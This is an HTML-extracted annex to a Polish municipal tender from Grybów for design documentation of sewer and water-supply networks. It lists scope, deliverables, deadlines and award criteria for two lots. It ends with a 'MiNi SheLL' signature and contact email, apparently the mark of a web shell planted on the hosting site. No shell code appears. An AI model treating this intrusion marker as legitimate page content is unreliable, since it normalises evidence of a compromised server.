</div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Opracowanie dokumentacji projektowo-kosztorysowej budowy kanalizacji sanitarnej i sieci wodociągowej wraz z przyłączami na os. Biała Wyżna do granicy z m. Kąclowa.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>3.1.5. W zakres zamówienia części I wchodzi: 3.1.5.1. Opracowanie mapy sytuacyjno-wysokościowej do celów projektowych w skali 1:500. 3.1.5.2. Sporządzenie wykazu działek ewidencyjnych, przez które będzie przebiegała kanalizacja sanitarna i sieć wodociągowa oraz wykazu przyłączy kanalizacyjnych i wodociągowych. 3.1.5.3. Uzyskanie wszystkich niezbędnych uzgodnień i opinii, w tym zgody na wejście w teren przy budowie sieci kanalizacyjnej i wodociągowej - zgodnie z wykazem działek, 3.1.5.4. Opracowanie ocen geologiczno-inżynierskich podłoża lub opinii geologicznych zgodnie z Miejscowym Planem Zagospodarowania Przestrzennego Miasta Grybowa. 3.1.5.5. Opracowanie projektu budowlanego oraz wykonawczego likwidacji oczyszczalni ścieków Nebraska na osiedlu Biała Wyżna i wpięcia mieszkańców do nowoprojektowanej sieci kanalizacyjnej. 3.1.5.6. Opracowanie projektów budowlanych oraz wykonawczych na zadanie pn.: ,,Budowa kanalizacji sanitarnej i sieci wodociągowej z przyłączami na os. Biała Wyżna do granicy z m. Kąclowa" a) Przybliżona długość sieci wodociągowej (bez przyłączy) - około 4 200mb b) Przybliżona długość kanalizacji sanitarnej (bez przyłączy) - około 3 300mb c) Przybliżona ilość przyłączy wodociągowych - około 90 szt. d) Przybliżona ilość przyłączy kanalizacyjnych - około 90 szt. 3.1.5.7. Zgodnie z załączoną mapą kanalizacji sanitarnej - Model matematyczny - rysunek W.07. Plan sieci kanalizacyjnej do zaprojektowania jest kanalizacja sanitarna wraz z przyłączami na terenie zlewni F32, F30 i F31 oraz sieć wodociągowa na tym terenie wraz z przyłączami. 3.1.5.8. Odbiorcą ścieków z projektowanego kolektora sanitarnego będzie oczyszczalnia ścieków ,,Równie" w Białej Niżnej. 3.1.5.9. Uwaga! Projektant w ramach niniejszego zadania przy ustaleniu średnic sieci wod. - kan, powinien również uwzględnić możliwość ewentualnego przyszłego włączenia do sieci mieszkańców z osiedla Biała Wyżna - zlewnia F23 oraz F24 (Model matematyczny - rysunek W.07. Plan sieci kanalizacyjnej). Obecnie Zamawiający dysponuje projektem gdzie planuje się włączenie mieszkańców tego rejonu do oczyszczalni ścieków Przedmieście (kanalizacja tłoczna z przepompowniami ścieków). Ze względu na ukształtowanie terenu Zamawiający rozważa możliwość zmiany projektowej i włączenie tych mieszkańców grawitacyjnie do nowoprojektowanej sieci kierującej ścieki do oczyszczalni Równie (w roku 2018 planowana rozbudowa o drugi reaktor i zwiększenie przepustowości QŚRD.= 600m3/d. Dotyczy to również sieci wodociągowej. 3.1.5.10. Opracowanie raportu wpływu na środowisko zgodnie z wymogami ustawowymi. 3.1.5.11. Wykonanie innych opracowań projektowych, w przypadku takiej konieczności, jak: operaty wodno-prawne, projekty przepompowni ścieków i wody, projekty przyłączy energetycznych, uzyskanie warunków przyłączenia zasilanie energetycznego, projekty odbudowy dróg, potoków, przełożenia w razie potrzeby sieci energetycznych, gazowych wod-kan itp. 3.1.5.12. Sporządzenie Informacji dotyczącej Bezpieczeństwa i Ochrony Zdrowia. 3.1.5.13. Uzyskanie w imieniu Zamawiającego prawomocnego pozwolenia na budowę. 3.1.5.14. Opracowanie przedmiarów robót z podstawą wyceny i kosztorysów inwestorskich w zakresie i formie określonej w Rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym. 3.1.5.15. Opracowanie specyfikacji technicznych wykonania i odbioru robót w zakresie i formie wymaganej w Rozporządzeniu Ministra Infrastruktury z dnia 02 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego. 3.1.5.16. Wykonawca jest zobowiązany do przygotowania dla Zamawiającego wszelkich niezbędnych odpowiedzi na pytania wykonawców w ramach przetargu publicznego na wykonawstwo robót budowlanych zamawianych dotyczących Dokumentacji opracowanej przez Wykonawcę. 3.1.5.17. Pełnienie nadzoru autorskiego wielobranżowego nad inwestycją wykonywaną w oparciu o dokumentację wymienioną powyżej. 3.1.5.18. Wykaz dokumentacji technicznej do odbioru dla części I: a) Mapy sytuacyjno-wysokościowe do celów projektowych w skali 1:500, które należy wykonać w formie papierowej (2 egz.) oraz w formie elektronicznej na płycie CD lub DVD. b) Projekty budowlane i projekty wykonawcze muszą spełniać wszelkie wymogi Prawa Budowlanego i przepisów z nim związanych oraz zawierać uzgodnienia i pozwolenia instytucji, właścicieli działek, przez które przebiegać będzie sieć kanalizacyjna i wodociągowa niezbędne do uzyskania pozwolenia na budowę. c) Pozwolenie na budowę d) Wszelkie inne pozwolenia i zgody niezbędne do realizacji zadania. e) Kosztorysy inwestorskie i przedmiary robót należy sporządzić: ? osobno dla sieci ? osobno dla przyłączy ? osobno dla urządzeń sieciowych i zasilania energetycznego 3.1.5.19. W przedmiarach robót oraz kosztorysach należy wyspecyfikować szczegółowo odcinki sieci oraz poszczególne przyłącza. 3.1.5.20. Należy sporządzić dokumentację w następującej ilości egzemplarzy: a) Projekty budowlane - w 5 egzemplarzach b) Projekty wykonawcze - w 5 egzemplarzach c) Pozostałe opracowania - w 3 egzemplarzach d) Całość dokumentacji należy również opracować w formie elektronicznej na płytach CD-w 2 egz. e) Wykonawca zobowiązany będzie ponadto przekazać całość dokumentacji w wersji elektronicznej plikach PDF i JPG oraz w formatach, w których zostały utworzone (np. Word, norma, autocad).<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>71322000-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-11-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">90,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin płatności faktury</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Opracowanie dokumentacji projektowo-kosztorysowej budowy odcinków sieci wod. - kan.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>3.1.6. W zakres zamówienia część II wchodzi: 3.1.6.1. Opracowanie mapy sytuacyjno-wysokościowej do celów projektowych w skali 1:500. 3.1.6.2. Sporządzenie wykazu działek ewidencyjnych, przez które będzie przebiegała kanalizacja sanitarna i sieć wodociągowa oraz wykazu przyłączy kanalizacyjnych i wodociągowych. 3.1.6.3. Uzyskanie wszystkich niezbędnych uzgodnień i opinii, w tym zgody na wejście w teren przy budowie sieci kanalizacyjnej i wodociągowej, 3.1.6.4. Opracowanie ocen geologiczno-inżynierskich podłoża lub opinii geologicznych zgodnie z Miejscowym Planem Zagospodarowania Przestrzennego Miasta Grybowa. 3.1.6.5. Opracowanie projektów budowlanych oraz wykonawczych części II obejmujących zadania pn.: a) Zadanie 1: projekt odcinka sieci wodociągowej i kanalizacyjnej w ul. Kościuszki w Grybowie - miejsce włączenia na załączonej dokumentacji graficznej. Odcinki sieci wodociągowej i kanalizacyjnej należy poprowadzić o ile to tylko możliwe po działkach będących własnością miasta o nr ewid. 16, 17 i 21 obr. 2 (optymalnie w poboczach i terenach zielonych) oraz przez tereny kolejowe tj. działkę 42/12 (tylko w koniecznym do ciągłości sieci zakresie). Zamawiający otrzymał wstępną zgodę na umieszczenie sieci na terenie kolejowym od PKP Polskie Linie Kolejowe S.A. Zakład Linii Kolejowych, Dział Automatyki, Telekomunikacji i Inwestycji w Nowym Sączu (pismo znak IZDK-505/311/2016 z dnia 31.01.2017r.). Przebieg odcinka sieci wodociągowej oraz kanalizacyjnej uzgodnić z Zamawiającym. Projekt powinien zawierać odcinki sieci wodociągowej i kanalizacyjnej wraz z przyłączami do budynków Kościuszki 31 i Kościuszki 33. b) Zadanie 2: projekt odcinka sieci kanalizacji sanitarnej na osiedlu Biała Wyżna. W związku z planowanym remontem odcinka drogi gminnej K 290820 położonej na działce nr 771 obr. 4 m. Grybowa konieczne jest zaprojektowanie odcinka kanalizacji sanitarnej wraz z przyłączami do istniejących i przewidywanych do budowy budynków na tym terenie. Miejsce włączenia oraz obszar do podpięcia do sieci kanalizacyjnej wskazano na załączniku graficznym. Obszar do podpięcia został zaznaczony na czerwono, ponadto Zamawiający wymaga włączenia do sieci kanalizacyjnej budynków położonych na działce nr 812 i 818 obr. 4 miasta Grybowa oraz ewentualnie działek gdzie planowana jest budowa domów. Przebieg sieci kanalizacyjnej uzgodnić z Zamawiającym. c) Zadanie 3: projekt odcinka kanalizacji sanitarnej w obrębie rynku w Grybowie - Zamawiający planuje doprojektowanie odcinka sieci kanalizacji sanitarnej (zamiennie do istniejącego projektu z przepompownią ścieków PpC1). Zamawiający posiada zgody właścicieli działek 455 obr. 1 oraz 727 obr. 1 na lokalizację odcinka kanalizacji sanitarnej po ich terenie. Do kanalizacji należy ,,podpiąć" mieszkańców budynków: Rynek 24 i 25, z ul. Kazimierza Wielkiego 2 oraz z ul. Pocztowej 2. d) Zadanie 4: projekt odcinka sieci wodociągowej na ul. Na Stoku - Zamawiający planuje doprojektowanie odcinka sieci wodociągowej - planowane miejsce włączenia do sieci wodociągowej w drodze ul. Na Stoku dz. nr 252 obr. 1 przy budynku nr 30. Planuje się zaprojektowanie odcinka sieci wodociągowej wraz z przyłączami do bud. 34 i 38 oraz 49 oraz działki 270, ewentualnie w razie potrzeby (planowana przez mieszkańców budowa domów) do działek sąsiednich. Należy dodatkowo zaprojektować hydranty na sieci. e) Zadanie 5: projekt spinki wodociągu w okolicy ul. Grunwaldzkiej w Grybowie stanowiący połączenie pomiędzy SUW ,,Równie" oraz ,,Park". Poglądowy przebieg połączeń (2 szt.) pokazano na Rys. 6.1. opracowania pn.: ,,Analiza funkcjonowania oraz określenie zakresu, warunków i wymagań technicznych w celu poprawy sposobu działania systemu wodociągowo-kanalizacyjnego na terenie miasta Grybowa" cz. I system wodociągowy - str. 17. f) Zadanie 6: projekt zbiornika zapasowo-wyrównawczego Kamienna Góra - budowa dwukomorowego zbiornika zapasowo-wyrównawczego posadowionego na rzędnej pozwalającej na uzyskanie ciśnienia ok. 2,0 barów na przyłączu najwyżej położonego budynku, jak również będącego w stanie objąć swym oddziaływaniem strefy ,,Turystyczna II" i ,,Turystyczna I". Zakres projektu obejmuje zaprojektowanie odcinka sieci wodociągowej od istniejącego odcinka sieci wodociągowej do zbiornika zapasowo-wyrównawczego. (ok. 428m sieci wodociągowej do zaprojektowania oraz 135m projekt zamienny w zakresie zmiany średnicy już zaprojektowanego wodociągu z DN 90 na DN110). g) Zadanie 7: projekt odcinka sieci kanalizacyjnej dla mieszkańców ul. Czerwona Góra - w celu likwidacji przepompowni PsH1, PpH4, PpH3 oraz PsK1 zamawiający planuje wykonanie grawitacyjnego odcinka kanalizacji sanitarnej od studzienki StH /36 do StH/22 równolegle do wcześniej zaprojektowanego odcinka od studzienki StH/35 do StH/22. Projektowany odcinek powinien uwzględnić przejście przez potok, odprowadzenie ścieków od mieszkańców ul. Turystycznej, podłączenie istniejących oraz przewidzianych do budowy budynków na ul. Czerwona Góra. W opracowaniu pn. ,,Analiza funkcjonowania oraz określenie zakresu, warunków i wymagań technicznych w celu poprawy sposobu działania systemu wodociągowo-kanalizacyjnego na terenie miasta Grybowa" cz. II system kanalizacyjny - str. 18, została przeprowadzona analiza możliwości rezygnacji z przepompowni PsK1 na rzecz odcinka kanalizacji grawitacyjnej. 3.1.6.6. Opracowanie raportu wpływu na środowisko zgodnie z wymogami ustawowymi jeśli jest to konieczne. 3.1.6.7. Wykonanie innych opracowań projektowych, w przypadku takiej konieczności, jak: operaty wodno-prawne, projekty przepompowni ścieków i wody, projekty przyłączy energetycznych, uzyskanie warunków przyłączenia zasilanie energetycznego, projekty odbudowy dróg, potoków, przełożenia w razie potrzeby sieci energetycznych, gazowych wod-kan itp. 3.1.6.8. Sporządzenie Informacji dotyczącej Bezpieczeństwa i Ochrony Zdrowia. 3.1.6.9. Uzyskanie w imieniu Zamawiającego prawomocnego pozwolenia na budowę. 3.1.6.10. Opracowanie przedmiarów robót z podstawą wyceny i kosztorysów inwestorskich w zakresie i formie określonej w Rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym. 3.1.6.11. Opracowanie specyfikacji technicznych wykonania i odbioru robót w zakresie i formie wymaganej w Rozporządzeniu Ministra Infrastruktury z dnia 02 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego. 3.1.6.12. Wykonawca jest zobowiązany do przygotowania dla Zamawiającego wszelkich niezbędnych odpowiedzi na pytania wykonawców w ramach przetargu publicznego na wykonawstwo robót budowlanych zamawianych dotyczących Dokumentacji opracowanej przez Wykonawcę. 3.1.6.13. Pełnienie nadzoru autorskiego wielobranżowego nad inwestycją wykonywaną w oparciu o dokumentację wymienioną powyżej. 3.1.6.14. Wykaz dokumentacji technicznej do odbioru dla części II: a) Mapy sytuacyjno-wysokościowe do celów projektowych w skali 1:500, które należy wykonać w formie papierowej (2 egz.) oraz w formie elektronicznej na płycie CD lub DVD. b) Projekty budowlane i projekty wykonawcze muszą spełniać wszelkie wymogi Prawa Budowlanego i przepisów z nim związanych oraz zawierać uzgodnienia i pozwolenia instytucji, właścicieli działek, przez które przebiegać będzie sieć kanalizacyjna i wodociągowa niezbędne do uzyskania pozwolenia na budowę. c) Pozwolenie na budowę na poszczególne zadania. d) Wszelkie inne pozwolenia i zgody niezbędne do realizacji poszczególnych zadań. e) Kosztorysy inwestorskie i przedmiary robót należy sporządzić: ? osobno dla sieci ? osobno dla przyłączy ? osobno dla urządzeń sieciowych i zasilania energetycznego f) W przedmiarach robót oraz kosztorysach należy wyspecyfikować szczegółowo odcinki sieci oraz poszczególne przyłącza. g) Należy sporządzić dokumentację w następującej ilości egzemplarzy: ? Projekty budowlane - w 5 egzemplarzach ? Projekty wykonawcze - w 5 egzemplarzach ? Pozostałe opracowania - w 3 egzemplarzach h) Całość dokumentacji należy również opracować w formie elektronicznej na płytach CD-w 2 egz. i) Wykonawca zobowiązany będzie ponadto przekazać całość dokumentacji w wersji elektronicznej plikach PDF i JPG oraz w formatach, w których zostały utworzone (np. Word, norma, autocad).<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>71322000-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-11-29<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">90,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin płatności faktury</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com